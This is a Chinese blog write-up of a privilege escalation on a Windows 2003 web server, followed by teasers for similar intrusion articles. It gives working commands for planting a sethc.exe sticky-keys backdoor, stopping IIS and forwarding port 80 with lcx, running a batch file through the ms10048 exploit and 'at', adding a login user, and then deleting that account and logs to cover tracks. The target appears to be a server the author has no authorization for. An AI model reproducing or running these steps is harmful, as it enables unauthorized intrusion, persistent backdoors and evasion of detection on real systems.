記一次艱難的提權

2021-06-20 21:41:02 字數 1047 閱讀 5733

記一次艱難的提權

資料報經過路由器就被拋棄了.

初步判斷是路由器設定了acl表。

掃瞄了一下目標伺服器,只開了80埠,伺服器作業系統是windows 2003. 埠復用在2003上不管用。 看來只有把iis停了再把45678埠轉到80埠上了。

在c:\windows 目錄中寫了個1.bat

內容是copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y /*替換sethc.exe,登陸上終端後按5下shift開啟cmd視窗*/

net stop w3svc

lcx.exe -tran 80 127.0.0.1 45678

net start w3svc /*這一行是為了當lcx意外崩潰後啟動iis。*/

不過需要注意的是 這個1.bat不能直接用ms10048.exe 執行 ,因為iis程序是ms10048.exe的父程序 ,把iis結束後ms10048.exe也就自動退出了 所以不會執行後面的**

執行time/t得到伺服器的時間是20:23。 ms10048.exe at 20:25 c:\windows\1.bat 讓伺服器在20:25執行1.bat 為了保險起見 再執行乙個ms10048.exe at 20:40 shutdown -r 讓伺服器在20:40重啟。

一兩分鐘後用遠端桌面連線 伺服器80埠成功連上,按無暇5下shift鍵彈出cmd視窗 新增使用者成功登陸。登陸後執行 at \delete \y 刪除剛才新增的定時重啟任務。

接下來就該幹什麼幹什麼去了。

退出的時候可以直接重啟伺服器 ,不過這樣不太厚道。 開啟乙個cmd視窗 執行query user 找到自己的使用者id ,我的使用者id是2。 然後在cmd視窗裡輸入 taskkill /im lcx.exe /f&logoff 2&net user 410502 /del&net start w3svc 這行命令的意思是 結束lcx.exe 登出我的使用者 刪掉我的使用者 然後啟動iis.

提權到此順利結束。

記一次初步Linux提權

前言 提權這麼久了 還是頭一次提下linux的伺服器。由於之前一直鑽研的win伺服器 要不是前些日子爆出來struts2 045漏洞 估計還沒時間接觸linux提權.正文 st2漏洞頁面 可以看到是root許可權的 接著就是想辦法新增乙個root組的使用者 由於新增使用者需要兩次重複輸入密碼 不像w...

記一次繞過寶塔提權

目標站點 72.243,首頁如下圖所示 簡單資訊收集得到以下資訊 thinkphp框架搭建的 可以利用遠端執行或者找找注入,本人習慣先從後台入手,url隨手加個admin得到後台 這裡沒有驗證碼復用,我們手動爆破下賬號密碼,這裡運氣不錯,管理賬號弱口令,直接進入後台 有了後台,getshell就相對...

一次 vulnhub靶機提權

kali linux vmware 橋接模式,複製網絡卡狀態 windows 物理機 檢視原始碼,得到 訪問 rambo.html kali 直接使用 掃出乙個目錄 johnnyrambo 這邊因為靶機是公用的,然後被人rm rf 了,所以我自己重新搭建了乙個 ip 位址改成 192.168.232...